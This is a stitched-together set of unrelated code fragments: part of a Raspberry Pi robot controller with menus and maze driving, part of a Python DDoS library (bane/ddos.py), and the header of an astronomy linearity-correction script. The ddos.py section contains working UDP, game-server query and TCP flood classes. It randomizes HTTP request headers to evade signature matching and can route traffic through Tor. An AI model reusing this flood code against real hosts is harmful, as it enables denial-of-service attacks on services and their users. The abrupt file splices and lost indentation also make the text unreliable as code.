        notfound_img = self.loadMenuImage('/home/pi/Pictures/Joystick.jpg')
        camera_img = self.loadMenuImage('/home/pi/Pictures/Camera.jpg')
        remote_img = self.loadMenuImage('/home/pi/Pictures/Remote-Controlled.jpg')
        lava_img = self.loadMenuImage('/home/pi/Pictures/Lava-Palava.jpg')
        mine_img = self.loadMenuImage('/home/pi/Pictures/Minesweeper.jpg')
        maze_img = self.loadMenuImage('/home/pi/Pictures/Maze.jpg')
        exit_img = self.loadMenuImage('/home/pi/Pictures/Exit.jpg')
        halt_img = self.loadMenuImage('/home/pi/Pictures/Halt.jpg')
        test_img = self.loadMenuImage('/home/pi/Pictures/Testing.jpg')
        track_img = self.loadMenuImage('/home/pi/Pictures/Track.jpg')
        reboot_img = self.loadMenuImage('/home/pi/Pictures/Reboot.jpg')
        gear = 2
        menu = 1
        MIN_MENU = 1
        MAX_MENU = 8
        running = True
        timing = 20000
        while running:
            try:
                self.show('Press CTRL+C to quit')
                self.showMenuImage(menu_img)
                cv.waitKey(1)
                with ControllerResource() as joystick:
                    if joystick.connected :
                        # Set previous menu item
                        prev = 0
                        menu = 1
                        # Loop indefinitely
                        while running:
                            presses = joystick.check_presses()
                            if presses.select:
                                # Ensure we have the camera attached for this challenges
                                if (menu == 2 or menu == 3 or menu == 4) and (self.camera.hasCamera == False):
                                    self.showMenuImage(camera_img)
                                elif menu == 7:
                                    self.testing(test_img)
                                    prev = 7
                                else:
                                    self.showMenuImage(menu_img)
                                    # doMenu returns False to leave the outer loop
                                    running = self.doMenu( menu, joystick, gear, test_img)
                                    if menu == 1:
                                        self.showMenuImage(remote_img)
                                    if menu == 2:
                                        self.showMenuImage(lava_img)
                                    if menu == 3:
                                        self.showMenuImage(mine_img)
                                    if menu == 4:
                                        self.showMenuImage(maze_img)
                                    if menu == 5:
                                        self.showMenuImage(exit_img)
                                    if menu == 6:
                                        self.showMenuImage(halt_img)
                                    if menu == 7:
                                        self.showMenuImage(test_img)
                                    if menu == 8:
                                        self.showMenuImage(reboot_img)
                                    prev = 0
                            if joystick.presses.dright:
                                menu += 1
                                if menu > MAX_MENU:
                                    menu = MIN_MENU
                            if joystick.presses.dleft:
                                menu -= 1
                                if menu < MIN_MENU:
                                    menu = MAX_MENU
                            # redraw only when the selection changed
                            if prev != menu:
                                #print(" Menu = {}".format(menu))
                                if menu == 1:
                                    self.showMenuImage(remote_img)
                                if menu == 2:
                                    self.showMenuImage(lava_img)
                                if menu == 3:
                                    self.showMenuImage(mine_img)
                                if menu == 4:
                                    self.showMenuImage(maze_img)
                                if menu == 5:
                                    self.showMenuImage(exit_img)
                                if menu == 6:
                                    self.showMenuImage(halt_img)
                                if menu == 7:
                                    self.showMenuImage(test_img)
                                if menu == 8:
                                    self.showMenuImage(reboot_img)
                                prev = menu
                            # Select menu option
                            # time.sleep(INTERVAL)
            except IOError:
                LOGGER.info('Unable to find joystick')
                self.showMenuImage(notfound_img)
                time.sleep(4.0)
            except KeyboardInterrupt:
                # CTRL+C exit, disable all drives
                self.bot.move(0, 0)
                self.show('Motors off')
                break
        cv.destroyAllWindows()
def doMenu(self, menu, joystick, gear, image ):
if menu == 1:
self.remoteNoCamera( joystick, gear )
return True
if menu == 2:
self.straight( joystick, gear )
return True
if menu == 3:
self.mine( joystick, gear )
return True
if menu == 4:
self.maze( joystick, gear, image )
return True
if menu == 5:
return False
if menu == 6:
self.shutdown()
# We don't expect to get here
return False
if menu == 7:
self.testing(image)
return True
if menu == 8:
self.reboot()
# We don't expect to get here
return False
    def reboot(self):
        """Show a message and reboot the Pi (the process will not survive)."""
        self.show("Reboot")
        os.system("sudo reboot")
    def shutdown(self):
        """Show a message and halt the Pi (the process will not survive)."""
        self.show("Shutdown")
        os.system("sudo halt")
    def testing(self, image):
        """Display the testing screen with current temperature and battery.

        The `image` argument is ignored: a fresh copy of the Testing
        splash is loaded so the overlaid text never accumulates.
        """
        image = self.loadMenuImage('/home/pi/Pictures/Testing.jpg')
        temp = self.bot.temperature()
        volts = self.bot.battery()
        cv.putText(image,temp,(50, 60), cv.FONT_HERSHEY_TRIPLEX, 2, (0, 0, 255), 5)
        cv.putText(image,volts,(50, 120), cv.FONT_HERSHEY_TRIPLEX, 2, (0, 0, 255), 5)
        self.showMenuImage(image)
# Pi Noon, Zombie Shoot, Temple of Doom, Eco Disaster
    def remoteNoCamera(self, joystick, gear):
        """Tank-style remote driving without the camera overlay.

        Left/right sticks drive the tracks; cross/triangle fire the
        trigger servo, d-pad up/down tilts.  L1/R1 change gear (clamped
        to 1..5).  HOME exits the loop and stops the motors.
        """
        self.show("Remote no Camera mode")
        self.bot.servo_off()
        count = 0
        while True:
            presses = joystick.check_presses()
            if presses.home:
                #self.show('HOME pressed since last check')
                running = False
                break
            count += 1
            left_drive = joystick.ly
            right_drive = joystick.ry
            self.bot.move(left_drive, right_drive, gear)
            if joystick.presses.cross:
                self.bot.trigger( 90 )
                time.sleep(0.25)
            if joystick.presses.triangle:
                self.bot.trigger( -90 )
                time.sleep(0.25)
            if joystick.presses.dup:
                self.bot.tilt( 30 )
                time.sleep(0.25)
            if joystick.presses.ddown:
                self.bot.tilt( -30 )
                time.sleep(0.25)
            self.bot.servo_off()
            prev = gear
            if joystick.presses.l1:
                gear += 0.5
            if joystick.presses.r1:
                gear -= 0.5
            # clamp gear to the supported range
            if gear < 1:
                gear = 1
            if gear > 5:
                gear = 5
            if gear != prev:
                print(" Gear = {}".format(gear))
            self.bot.move(left_drive, right_drive, gear)
        self.bot.stop()
    def remoteWithCamera(self, joystick, gear):
        """Remote driving with the live camera feed and telemetry overlay.

        Returns immediately when no camera is attached.  Sticks drive,
        cross/triangle fire the trigger, d-pad tilts/pans the camera,
        L1/R1 change gear (clamped 1..5).  HOME exits and stops motors.
        """
        self.show("Remote with Camera mode")
        if self.camera.hasCamera == False:
            return
        rawCapture = PiRGBArray( self.camera, size=(self.w, self.h))
        # give the camera a moment to warm up before capturing
        time.sleep(0.1)
        count = 0
        for frame in self.camera.CaptureContinous(rawCapture):
            presses = joystick.check_presses()
            if presses.home:
                #self.show('HOME pressed since last check')
                running = False
                break
            image = frame.array
            heading, roll, pitch = self.bot.readEuler()
            distance = self.bot.getDistance()
            count = 0
            text = "gear={0} : angle={1:5.2} : mm={2}".format(gear, heading, distance)
            cv.putText(image,text,(10, 20), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255))
            count += 1
            left_drive = joystick.ly
            right_drive = joystick.ry
            self.bot.move(left_drive, right_drive, gear)
            if joystick.presses.cross:
                self.bot.trigger( 90 )
            if joystick.presses.triangle:
                self.bot.trigger( -90 )
            if joystick.presses.dup:
                self.bot.tilt( -10 )
            if joystick.presses.ddown:
                self.bot.tilt( 10 )
            if joystick.presses.dright:
                self.bot.pan( -5 )
            if joystick.presses.dleft:
                self.bot.pan( 5 )
            prev = gear
            if joystick.presses.l1:
                gear += 0.5
            if joystick.presses.r1:
                gear -= 0.5
            # clamp gear to the supported range
            if gear < 1:
                gear = 1
            if gear > 5:
                gear = 5
            #if gear != prev:
            # print(" Gear = {}".format(gear))
            self.showMenuImage(image)
            # reuse the capture buffer for the next frame
            rawCapture.truncate(0)
        self.bot.move(left_drive, right_drive, gear)
        self.bot.stop()
    def maze(self, joystick, gear, image):
        """Escape Route challenge: a fixed 11-state dead-reckoning run.

        Drives legs of a preset course using the IMU heading and the
        range sensor: even states travel until a distance threshold,
        odd states rotate in place to the next cardinal heading.  The
        planned path is drawn onto the track image as it is completed.
        START toggles the motors on/off; HOME exits.

        NOTE(review): `heading` is assumed to be 0..360 degrees from
        bot.readEuler() and `distance` in mm from getDistance() --
        confirm against the Robot class.
        """
        self.show("Escape Route mode")
        # the image parameter is ignored; a fresh track map is loaded
        image = self.loadMenuImage('/home/pi/Pictures/Track.jpg')
        #if self.camera.hasCamera == False:
        #    return
        #rawCapture = PiRGBArray( self.camera, size=(self.w, self.h))
        #time.sleep(0.1)
        # State 0
        # Travel until 276
        # State 1
        # Turn to 90
        # State 2
        # Travel until 174
        # State 3
        # Turn to 180
        # State 4
        # Travel until 276
        # State 5
        # Turn to 90
        # State 6
        # Travel until 174
        # State 7
        # Turn to 0
        # State 8
        # Travel to 276
        # State 9
        # Turn to 90
        # State 10
        # Travel until 100
        left_drive = 1
        right_drive = 1
        firsttime = True
        offset = 0
        gear = 2
        state = 0
        running = False
        count = 0
        turn_speed = 0.8
        target = 0.0
        adjust = 0.0
        while True:
            # for frame in self.camera.CaptureContinous(rawCapture):
            presses = joystick.check_presses()
            if presses.home:
                running = False
                break
            if presses.start:
                # START toggles driving without leaving the loop
                running = not running
            #image = frame.array
            # Read the Euler angles for heading, roll, pitch (all in degrees).
            heading, roll, pitch = self.bot.readEuler()
            distance = self.bot.getDistance()
            # If heading just less than 360 then create an offset
            if firsttime and heading > 270:
                offset = 360 - heading
                firsttime = False
            # heading += offset
            # Target 0/360
            if state == 0 and distance > 276:
                adjust, left_drive, right_drive = self.getAdjustedDrive( 0.0, heading, distance )
            elif state == 0 and distance <= 276:
                # Red 438, 434 - 208, 434
                cv.line(image, (438, 434),( 208, 434), (0,0,255),5)
                left_drive = 0
                right_drive = 0
                state = 1
            # Turn Right - Target 90
            elif state == 1 and (heading > 270 or heading < 90 ):
                left_drive = turn_speed
                right_drive = -turn_speed
            elif state == 1 and (heading >= 90 and heading < 180):
                left_drive = 0
                right_drive = 0
                cv.circle(image, (208, 434), 8, (255,0,0),8)
                state = 2
            elif state == 2 and distance > 174:
                adjust, left_drive, right_drive = self.getAdjustedDrive( 90.0, heading, distance )
            elif state == 2 and distance <= 174:
                # 208, 434 - 208, 298
                cv.line(image, (208, 434),( 208, 298), (0,0,255),5)
                left_drive = 0
                right_drive = 0
                state = 3
            # Turn Right - Target 180
            elif state == 3 and heading < 180:
                left_drive = turn_speed
                right_drive = -turn_speed
            elif state == 3 and heading >= 180:
                left_drive = 0
                right_drive = 0
                cv.circle(image, (208, 298), 8, (255,0,0),8)
                state = 4
            elif state == 4 and distance > 100:
                adjust, left_drive, right_drive = self.getAdjustedDrive( 180.0, heading, distance )
            elif state == 4 and distance <= 100:
                # 208, 298 - 404, 298
                cv.line(image, (208, 298),( 404, 298), (0,0,255),5)
                left_drive = 0
                right_drive = 0
                state = 5
            # Turn Left - Target 90
            elif state == 5 and heading > 90:
                left_drive = -turn_speed
                right_drive = turn_speed
            elif state == 5 and heading <= 90:
                left_drive = 0
                right_drive = 0
                cv.circle(image, (404, 298), 8, (255,0,0),8)
                state = 6
            elif state == 6 and distance > 174:
                adjust, left_drive, right_drive = self.getAdjustedDrive( 90.0, heading, distance )
            elif state == 6 and distance <= 174:
                # 404, 298 - 404, 142
                cv.line(image, (404, 298),( 404, 142), (0,0,255),5)
                left_drive = 0
                right_drive = 0
                state = 7
            # Turn Left - Target 0/360
            elif state == 7 and ( heading >= 0 and heading < 90 ):
                left_drive = -turn_speed
                right_drive = turn_speed
            elif state == 7 and ( heading >= 270 and heading <= 360 ):
                left_drive = 0
                right_drive = 0
                cv.circle(image, (404, 142), 8, (255,0,0),8)
                state = 8
            elif state == 8 and distance > 276:
                adjust, left_drive, right_drive = self.getAdjustedDrive( 0.0, heading, distance )
            elif state == 8 and distance <= 276:
                # 404, 142 - 220, 142
                cv.line(image, (404, 142),( 220, 142), (0,0,255),5)
                left_drive = 0
                right_drive = 0
                state = 9
            # Turn Right - Target 90+ diff
            elif state == 9 and (heading > 270 or heading < 90):
                left_drive = turn_speed
                right_drive = -turn_speed
            elif state == 9 and heading >= 90:
                left_drive = 0
                right_drive = 0
                cv.circle(image, (220, 142), 8, (255,0,0),8)
                state = 10
            elif state == 10:
                # 220, 142 - 220, 56
                cv.line(image, (220, 142),( 220, 56), (0,0,255),5)
                adjust, left_drive, right_drive = self.getAdjustedDrive( 90.0, heading, distance )
            # telemetry banner: blank the strip, then overlay state text
            drive = "FWD"
            if left_drive < right_drive:
                drive = "LFT"
            elif left_drive > right_drive:
                drive = "RGT"
            cv.rectangle(image,(0,0),(640,50),(0,0,0),-1);
            text = "st={0} {1:.2f}({2:.2f}) {3}mm {4}".format(state, heading, adjust, distance, drive)
            cv.putText(image,text,(10, 30), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255))
            self.showMenuImage(image)
            #rawCapture.truncate(0)
            if running:
                self.bot.move(left_drive, right_drive, gear)
            else:
                self.bot.stop()
            time.sleep(self.bot.getInterval())
        self.bot.stop()
        cv.namedWindow('image', cv.WND_PROP_FULLSCREEN)
        cv.setWindowProperty('image',cv.WND_PROP_FULLSCREEN,cv.WINDOW_FULLSCREEN)
        cv.waitKey(10)
def mine(self, joystick, gear):
self.show("Mine Sweeper mode")
if self.camera.hasCamera == False:
return
hw = int(self.w//2)
hh = int(self.h//2)
rawCapture = PiRGBArray( self.camera, size=(self.w, self.h))
time.sleep(0.1)
showImage = 0
colour = np.array([0, 0, 0])
lower = np.array([110,38,34])
upper = np.array([130,255,255])
#colour_arrays = COLOURS["red"]
#lower = np.array(colour_arrays[0], dtype = "uint8")
#upper = np.array(colour_arrays[1], dtype = "uint8")
brightness = self.camera.Brightness
running = False
mode = 0
states = ["Hunting","Driving","Sleeping","Reversing"]
xPos = 0
yPos = 0
angle = 45
diff = 10
gear = 2
state = 0
frameNo = 1.0
start = seconds()
for frame in self.camera.CaptureContinous(rawCapture):
presses = joystick.check_presses()
if presses.home:
running = False
break
if presses.start:
xPos = -1
yPos = -1
angle = 45
diff = 0
mode = 0
running = True
if joystick.presses.dup:
self.bot.tilt( -10 )
time.sleep(0.5)
elif joystick.presses.ddown:
self.bot.tilt( 10 )
time.sleep(0.5)
elif joystick.presses.dright:
self.bot.pan( -5 )
time.sleep(0.5)
elif joystick.presses.dleft:
self.bot.pan( 5 )
time.sleep(0.5)
else:
self.bot.servo_off()
yPos = self.h - int(((joystick.ly + 1) * self.h)/2)
xPos = int(((joystick.lx + 1) * self.w)/2)
yPos = min(self.h - 1, yPos)
xPos = min(self.w - 1, xPos)
# Take image
image = | |
<filename>bane/ddos.py
import requests, cfscrape, socks, os, sys, urllib, socket, random, time, threading, ssl
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# import the dependencies for each python version
if sys.version_info < (3, 0):
# Python 2.x
import httplib
import urllib2
from scapy.config import conf
conf.ipv6_enabled = False
from scapy.all import *
else:
# Python 3.x
import http.client
httplib = http.client
import urllib.request
urllib2 = urllib.request
from kamene.config import conf
conf.ipv6_enabled = False
from kamene.all import *
from struct import *
from bane.iot import getip
from bane.payloads import *
from bane.proxer import *
# Environment detection. Default both flags to False so they are always
# defined before being tested below: the original only assigned them inside
# the isdir() branches, which raised NameError on any non-Android host.
adr = False  # True when the device is an android
termux = False  # True when the application which runs the module is Termux
if os.path.isdir("/data/data") == True:
    adr = True  # the device is an android
if os.path.isdir("/data/data/com.termux/") == True:
    termux = True  # the application which runs the module is Termux
if (termux == False) or (adr == False):
    from bane.swtch import *
def reorder_headers_randomly(s):
    """Shuffle the header lines of a raw HTTP request string.

    The request line stays first and the body (everything after the first
    blank line) stays last; only the header lines in between are reordered,
    which helps the generated requests evade naive signature matching.
    """
    segments = s.split("\r\n\r\n")
    head, body = segments[0], segments[1]
    head_lines = head.split("\r\n")
    request_line, headers = head_lines[0], head_lines[1:]
    random.shuffle(headers)
    return request_line + "\r\n" + "\r\n".join(headers) + "\r\n\r\n" + body
def random_param():
    """Return a random URL-parameter token.

    With equal probability, either a stringified integer in [1, 1000] or a
    random entry from the module-level ``lis`` character list.
    """
    if random.randint(1, 2) == 1:
        return str(random.randint(1, 1000))
    return random.choice(lis)
def setup_http_packet(
    target,
    ty,
    paths,
    post_field_min,
    post_field_max,
    post_min,
    post_max,
    cookie,
    user_agents,
):
    """Build a raw, randomized HTTP/1.1 request string for flood traffic.

    Args:
        target: Host header value (hostname or IP).
        ty: request type; 1 builds a GET request, anything else a POST.
        paths: list of candidate request paths; one is picked at random.
        post_field_min/post_field_max: bounds on the POST field-name length.
        post_min/post_max: bounds on the POST field-value length.
        cookie: optional cookie string; included as a Cookie header if truthy.
        user_agents: list of User-Agent strings to pick from.

    Returns:
        The full request text with its header lines randomly reordered.

    NOTE(review): relies on module-level wordlists from bane.payloads
    (lis, ec, al, a, ac, cc, referers) -- assumed to be non-empty lists of
    strings; verify against bane/payloads.py.
    """
    pa = random.choice(paths)  # bypassing cache engine
    # random query-string key (q) and value (p) so every request URL differs
    q = ""
    for i in range(random.randint(2, 5)):
        q += random_param() + random_param()
    p = ""
    for i in range(random.randint(2, 5)):
        p += random_param() + random_param()
    # append with '&' if the path already carries a query string, else '?'
    if "?" in pa:
        jo = "&"
    else:
        jo = "?"
    pa += jo + q + "=" + p
    # setting random headers
    # NOTE(review): only the last loop iteration's `ed` (Accept-Encoding
    # value) survives; earlier iterations just consume randomness.
    for l in range(random.randint(1, 5)):
        ed = random.choice(ec)
        oi = random.randint(1, 3)
        if oi == 2:
            # 1-in-3 chance: extend the encoding header with a second,
            # distinct encoding token
            gy = 0
            while gy < 1:
                df = random.choice(ec)
                if df != ed:
                    gy += 1
                    ed += ", "
                    ed += df
    # Accept-Language value: base language plus 0-5 ";q=<weight>,<lang>" parts
    # (reuses the loop variable name `l` from above)
    l = random.choice(al)
    for n in range(random.randint(0, 5)):
        l += ";q={},".format(round(random.uniform(0.1, 1), 1)) + random.choice(al)
    kl = random.randint(1, 2)  # NOTE(review): unused; kept for randomness parity?
    ck = ""
    if cookie:
        ck = "Cookie: " + cookie + "\r\n"
    if ty == 1:
        # GET request with fully randomized header values and referer
        m = "GET {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept: {}\r\nAccept-Language: {}\r\nAccept-Encoding: {}\r\nAccept-Charset: {}\r\nKeep-Alive: {}\r\nConnection: Keep-Alive\r\nCache-Control: {}\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(
            pa,
            ck,
            random.choice(user_agents),
            random.choice(a),
            l,
            ed,
            random.choice(ac),
            random.randint(100, 1000),
            random.choice(cc),
            (
                random.choice(referers)
                + random.choice(lis)
                + str(random.randint(0, 100000000))
                + random.choice(lis)
            ),
            target,
        )
    else:
        # POST request: random form field name (k) and value (j)
        k = ""
        for _ in range(random.randint(post_field_min, post_field_max)):
            k += random.choice(lis)
        j = ""
        for x in range(random.randint(post_min, post_max)):
            j += random.choice(lis)
        par = k + "=" + j
        m = "POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: {}\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n{}".format(
            pa,
            ck,
            random.choice(user_agents),
            l,
            random.randint(300, 1000),
            len(par),
            (
                random.choice(referers)
                + random.choice(lis)
                + str(random.randint(0, 100000000))
                + random.choice(lis)
            ),
            target,
            par,
        )
    return reorder_headers_randomly(m)
def get_public_dns(timeout=15):
    """Download the public DNS resolver list from public-dns.info.

    Args:
        timeout: request timeout in seconds.

    Returns:
        list of resolver IP strings, one per response line (the response's
        trailing newline yields a final empty string), or [] when the
        download fails for any reason.
    """
    try:
        return (
            requests.get(
                "https://public-dns.info/nameservers.txt", timeout=timeout
            ).text
        ).split("\n")
    # was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit;
    # Exception still covers all requests/network errors for the best-effort
    # empty result
    except Exception:
        return []
def reset():
    """Restore the module-level attack-state globals to their defaults."""
    global counter, stop, coo, ual, flag, ier, pointer, ue
    counter = 0    # packets sent so far
    stop = False   # cooperative stop flag for worker loops
    coo = False
    ual = []       # user-agent list
    flag = -1
    ier = 0
    pointer = 0
    ue = []
"""
the following classes are for DoS attacks simulations with different tools that have been either originally written in
diffferent languages (Perl: slowloris and C: xerxes and slow_read attack...) and rewritten in python and other python tools that are PoC for
some vulnerabilities (slow post attacks, hulk) with some modifications that has improved their performance!!!
"""
class udp_flood:
    """UDP flood simulation: worker threads spray random payloads at a host.

    The attack stops after ``duration`` seconds, or immediately via kill(),
    which wipes the instance attributes so running workers crash out of
    their loops (the surrounding try/except absorbs the crash).
    """

    def __init__(
        self,
        u,
        p=80,
        threads_daemon=True,
        interval=0.001,
        min_size=10,
        max_size=10,
        connection=True,
        duration=60,
        threads=1,
        limiting=True,
        logs=False,
    ):
        """Store settings and immediately launch ``threads`` worker threads.

        Args:
            u: target host (IP or hostname).
            p: target UDP port.
            threads_daemon: run workers as daemon threads.
            interval: sleep between packets when ``limiting`` is True (s).
            min_size/max_size: payload length bounds (chars, capped at 1400).
            connection: if True, connect() the UDP socket before sendto().
            duration: maximum attack length in seconds.
            threads: number of worker threads to start.
            limiting: whether to rate-limit with ``interval``.
            logs: write a packets/bytes counter line to stdout.
        """
        self.target = u
        self.port = p
        self.interval = interval
        self.min_size = min_size
        self.max_size = max_size
        self.connection = connection
        self.duration = duration
        self.limiting = limiting
        self.logs = logs
        self.stop = False
        self.counter = 0
        self.start = time.time()
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        """Worker loop: send random-sized UDP payloads until time/stop."""
        try:
            time.sleep(1)
            tm = time.time()
            size = 0  # bytes sent in the current 1-second logging window
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    # new socket per packet; payload drawn from the `lis`
                    # character list (bane.payloads)
                    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                    if self.connection == True:
                        s.connect((self.target, self.port))
                    msg = ""
                    for x in range(random.randint(self.min_size, self.max_size)):
                        msg += random.choice(lis)
                    if len(msg) > 1400:
                        msg = msg[
                            0:1400
                        ]  # make sure all payloads' sizes are on the right range
                    s.sendto((msg.encode("utf-8")), (self.target, self.port))
                    size += len(msg)
                    self.counter += 1
                    if (self.logs == True) and (int(time.time() - tm) == 1):
                        sys.stdout.write(
                            "\rPackets: {} | Bytes/s: {} ".format(self.counter, size)
                        )
                        sys.stdout.flush()
                        tm = time.time()
                        size = 0
                    if self.limiting == True:
                        time.sleep(self.interval)
                except:
                    # after kill() the attributes are gone, so even
                    # time.sleep(self.interval) can raise -- guard it too
                    try:
                        time.sleep(self.interval)
                    except:
                        pass
            self.kill()
        except:
            pass

    def done(self):
        """Return True once kill()/reset() has wiped the instance state."""
        if "stop" in dir(self):
            return False
        return True

    def reset(self):
        """Delete every instance attribute (None them first, then delattr)."""
        l = []
        for x in self.__dict__:
            self.__dict__[x] = None
            l.append(x)
        for x in l:
            delattr(self, x)

    def kill(self):
        """Stop the attack and return the final packet count.

        NOTE(review): unlike vse_flood.kill, this does not guard with
        '"stop" in dir(self)', so a second kill() raises KeyError -- confirm
        intentional.
        """
        self.stop = True
        a = self.__dict__["counter"]
        self.reset()  # this will kill any running threads instantly by setting all the attacking information to "None" and cause error which is handled with the "try...except..." around the main while loop
        return a
class vse_flood:
    """Valve Source Engine query flood: repeatedly sends the TSource Engine
    Query datagram to a game server, one socket per packet.

    Same lifecycle as udp_flood: runs for ``duration`` seconds or until
    kill(), which wipes the attributes so worker threads crash out.
    """

    def __init__(
        self,
        u,
        p=80,
        threads_daemon=True,
        interval=0.001,
        connection=True,
        duration=60,
        threads=1,
        limiting=True,
        logs=False,
    ):
        """Store settings and immediately launch ``threads`` worker threads.

        Args mirror udp_flood.__init__ minus the payload-size bounds (the
        payload here is the fixed Source Engine query packet).
        """
        self.target = u
        self.port = p
        self.payload = b"\xff\xff\xff\xffTSource Engine Query\x00"  # read more at https://developer.valvesoftware.com/wiki/Server_queries
        self.interval = interval
        self.connection = connection
        self.duration = duration
        self.limiting = limiting
        self.logs = logs
        self.stop = False
        self.counter = 0
        self.start = time.time()
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        """Worker loop: send the fixed query payload until time/stop."""
        try:
            time.sleep(1)
            tm = time.time()
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                    if self.connection == True:
                        s.connect((self.target, self.port))
                    s.sendto(self.payload, (self.target, self.port))
                    self.counter += 1
                    if (self.logs == True) and (int(time.time() - tm) == 1):
                        sys.stdout.write("\rPackets: {} ".format(self.counter))
                        sys.stdout.flush()
                        tm = time.time()
                    if self.limiting == True:
                        time.sleep(self.interval)
                except:
                    pass
                # second sleep guarded separately: after kill() the
                # attributes are gone and self.interval itself raises
                try:
                    time.sleep(self.interval)
                except:
                    pass
            self.kill()
        except:
            pass

    def done(self):
        """Return True once kill()/reset() has wiped the instance state."""
        if "stop" in dir(self):
            return False
        return True

    def reset(self):
        """Delete every instance attribute (None them first, then delattr)."""
        l = []
        for x in self.__dict__:
            self.__dict__[x] = None
            l.append(x)
        for x in l:
            delattr(self, x)

    def kill(self):
        """Stop the attack (idempotent guard) and return the packet count."""
        if "stop" in dir(self):
            self.stop = True
        a = self.__dict__["counter"]
        self.reset()
        return a
class tcp_flood:
def __init__(
self,
u,
p=80,
threads_daemon=True,
min_size=10,
max_size=50,
threads=256,
timeout=5,
round_min=1000,
round_max=10000,
interval=0.001,
duration=60,
logs=False,
tor=False,
):
self.logs = logs
self.stop = False
self.counter = 0
self.start = time.time()
self.target = u
self.duration = duration
self.port = p
self.timeout = timeout
self.tor = tor
self.min_size = min_size
self.max_size = max_size
self.interval = interval
self.round_min = round_min
self.round_max = round_max
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1) # give time for all threads to be created
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor == False:
s.settimeout = (
self.timeout
) # we can't set timeout with socks module if we are going to use a socks proxy
if self.tor == True:
s.setproxy(
socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True
) # let the traffic go through tor
s.connect((self.target, self.port)) # connect to target
if (self.port == 443) or (self.port == 8443):
s = ssl.wrap_socket(
s, ssl_version=ssl.PROTOCOL_TLSv1
) # use ssl if needed on specific ports
for l in range(
random.randint(self.round_min, self.round_max)
): # send packets with random number of times for each connection (number between "round_min" and "round_max")
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if stop == True:
break
m = ""
for li in range(
random.randint(self.min_size, self.max_size)
): # each payload' size is chosen randomly between maximum and minimum values
m += random.choice(lis)
try:
if stop == True:
break
s.send(m.encode("utf-8"))
self.counter += 1
if self.logs == True:
sys.stdout.write(
"\rPackets: {} | Bytes: {} ".format(
self.counter, len(m)
)
)
sys.stdout.flush()
# print("Packets: {} | Bytes: {}".format(tcp_counter,len(m)))
time.sleep(self.interval)
except:
break
time.sleep(self.interval)
s.close()
except:
pass
time.sleep(0.1)
self.kill()
except:
pass
| |
<filename>nirlin.py
#!/usr/bin/env python
# 2007 Aug 27 - <NAME> - alpha version
# 2007 Aug 28 - AWS - beta version
# 2007 Sep 20 - AWS - new coefficients based on spectroscopic flats
# 2008 Feb 12 - AWS - handle coadds & nprepared data
# 2008 Feb 12 - AWS - default output naming to match Gemini IRAF convention
# 2008 Feb 12 - AWS - add .fits extension if not given
# 2008 Feb 14 - AWS - new coefficients based on average count rate
# 2008 Apr 15 - AWS - new coefficients based on new model
# 2008 Apr 25 - AWS - include y-position coefficients
# 2008 Oct 21 - AWS - update coefficients derived with low-flux data
# 2008 Oct 23 - AWS - include high-flux (phot) and full-range flux (spec) coefficients
# 2008 Oct 24 - AWS - handle NaN, Inf, and negative corrections
# 2008 Oct 29 - AWS - settle on three best sets of shallow-well coefficients
# 2008 Nov 03 - AWS - set minimum counts for correction = 10 ADU
# 2008 Dec 07 - AWS - add HRN Deep-well coefficients and max count limits
# 2009 Jan 05 - AWS - set uncorrectable pixels to BADVAL
# 2009 Jan 09 - AWS - add option to force correction outside recommended range
# 2009 Jan 13 - AWS - check that this script has not already been run
# 2009 May 22 - AWS - verify FITS header to catch old images with unquoted release date string
# 2010 Jun 18 - <NAME> - new coefficients for subarrays based on average count rate
# 2010 Jul 19 - NTL - modified coefficients for MRN-1024-Shallow, now correct down to 1 count
# 2010 Aug 24 - NTL - coefficients from SVD fit are now included
# 2010 Sep 26 - AWS - include med-RN 256 shallow-well
# 2010 Nov 22 - AWS - include high-RN 1024 deep and shallow-well; multiply by coadds at end
# 2013 Apr 11 - AWS - multiply exposure time of nprepared images by the number of coadds
# 2013 Jun 24 - AWS - convert history list to a string before searching it
#-----------------------------------------------------------------------
import datetime
import getopt
import glob
import numpy
import os
import pyfits
import sys
version = '2013 Jun 24'
#-----------------------------------------------------------------------
def usage():
    """Print the command-line help text, then exit by raising SystemExit."""
    print ''
    print 'NAME'
    print '       nirlin.py - NIR linearization\n'
    print 'SYNOPSIS'
    print '       nirlin.py [options] infile\n'
    print 'DESCRIPTION'
    print '       Run on raw or nprepared Gemini NIRI data, this'
    print '       script calculates and applies a per-pixel linearity'
    print '       correction based on the counts in the pixel, the'
    print '       exposure time, the read mode, the bias level and the'
    print '       ROI.  Pixels over the maximum correctable value are'
    print '       set to BADVAL unless given the force flag.'
    print '       Note that you may use glob expansion in infile,'
    print '       however, any pattern matching characters (*,?)'
    print '       must be either quoted or escaped with a backslash.'
    print '      '
    print 'OPTIONS'
    print '       -b <badval> : value to assign to uncorrectable pixels [0]'
    print '       -f : force correction on all pixels'
    print '       -o <file> : write output to <file> [l<inputfile>]'
